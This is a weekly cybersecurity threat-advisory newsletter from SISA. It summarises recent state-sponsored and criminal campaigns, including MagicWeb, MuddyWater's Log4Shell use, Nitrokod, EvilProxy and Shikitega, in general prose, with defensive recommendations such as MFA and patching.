SISA Weekly Threat Watch
This past week saw the emergence of a new?phishing platform?for automated attacks and multiple new malwares backed by state-sponsored groups and organizations. Persistent usage of a wide range of tools and modified techniques like?cryptocurrency mining,?PowerShell?commands and?polymorphic encoding?for attacks indicated that threat groups have access to an extensive range of resources and diverse skills. This certainly cannot be overlooked by security professionals and network administrators.
SISA Weekly Threat Watch?– our weekly feature brings you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical?threats.
Microsoft has identified that the Russian hacker group APT29 (also known as NOBELIUM, Cozy Bear) is deploying a brand-new piece of malware called?MagicWeb, that enables anyone in a compromised network to authenticate. The tool modifies user authentication certificates and claims passed in tokens created by the infected server by swapping out a legitimate?DLL?used by?ADFS?for a malicious one.
The Microsoft.IdentityServer.Diagnostics.dll is modified by?NOBELIUM?with a backdoored version that has an extra section in the?“TraceLog”?class. Four genuine ADFS functions – Build, GetClientCertificate, EndpointConfiguration, and ProcessClaims—are hooked using the function to carry out various operations inside the targeted network. Microsoft advises to adhere to their report’s hunting recommendations and use 365 Defender to hunt the?Global Assembly Cache (GAC)?for unsigned DLLs.
The Log4Shell vulnerability in?SysAid?apps is being exploited by Mercury APT, also known as MuddyWater, a group sponsored by the Iranian government. Earlier in 2022, the group used Log4j 2 exploits against?VMware apps, and they are currently abusing a similar vulnerability in SysAid programmes.m. To communicate with their C2 server, the attackers have used a variety of techniques, notably PowerShell along with?eHorus?– a tool for remote monitoring, and?vpnui.exe?– a special version of Ligolo.
After entering the target network, attackers establish persistence, move laterally across the organization, and steal credentials. Even though SysAid patched the?Log4Shell?flaw after it was made public, some organizations have not used the patch yet. To reduce the risk of credentials being compromised, it is recommended to enable?multi-factor authentication?(MFA)?and ensure that it is enforced for any remote connectivity.
A new malware campaign spreading cryptocurrency mining malware across 11 countries was discovered to be masquerading as?Google Translate?or?MP3 downloaders, propagated through reputable free software sites. According to research by Check Point, the malware was developed by a firm called “Nitrokod,” which at first sight appears clean of malware and offers the stated functionality.
领英推荐
The user receives a password protected?RAR?that avoids antivirus detection and contains an executable with the same name as the app selected. On the fifth day of the infection, the malware activates a dropper from another encrypted RAR file and uses?PowerShell commands?to purge all system logs. The software loads the last dropper after 15 days, which retrieves another RAR file containing the?XMRig?mining malware, its controller, and a “.sys” file before dropping the final payload. To prevent such attacks, it is advised to avoid installing apps that claim features that have not been officially announced by the developer, like a desktop?Google Translate tool.
EvilProxy is a reverse-proxy?phishing-as-a-service (PaaS)?platform that claims to be able to steal authentication tokens from sites such as Apple, Google, Facebook, Microsoft, Twitter, GitHub, GoDaddy, and even PyPI to get past?multi-factor authentication (MFA). The service makes it possible for low-skill threat actors to steal internet accounts that are otherwise well-protected because they do not know how to set up reverse proxies.
The?reverse proxy?shows the genuine login form, forwards requests, and returns responses from the business website when the victim connects to a?phishing page. The threat actors then log in to the website using the authentication cookie as the user. Resecurity says that each user organizes their personal payment for the service through?Telegram. Conducting regular backups, using strong passwords, enforcing MFA, and implementing?DLP?solution on computers is highly recommended to stay protected from phishing attacks.
Shikitega, a new stealthy?Linux malware, has been discovered to infect computers and IoT devices with extra payloads. The malware launches a cryptocurrency miner on infected devices after adding persistence to the host via?crontab?and exploiting vulnerabilities to gain privileges.?Shikitega?malware uses a polymorphic encoder and distributes its payload gradually, with each stage exposing only a portion of the payload, according to AT&T’s report.
The malware uses the encoder to run through multiple decode loops, in which each loop decodes the next layer until the final?shellcode payload?is decoded and executed. The shellcode is then executed to communicate with the malware’s command and control servers (C2) and obtain additional shellcode (commands). The final stage payload, a bitcoin miner, is downloaded as root by?Mettle?using a smaller ELF file which exploits?PwnKit vulnerability. It is recommended to keep the software up to date along with enforcing MFA and using strong passwords to protect systems from being compromised.
See you next week with more interesting bites!!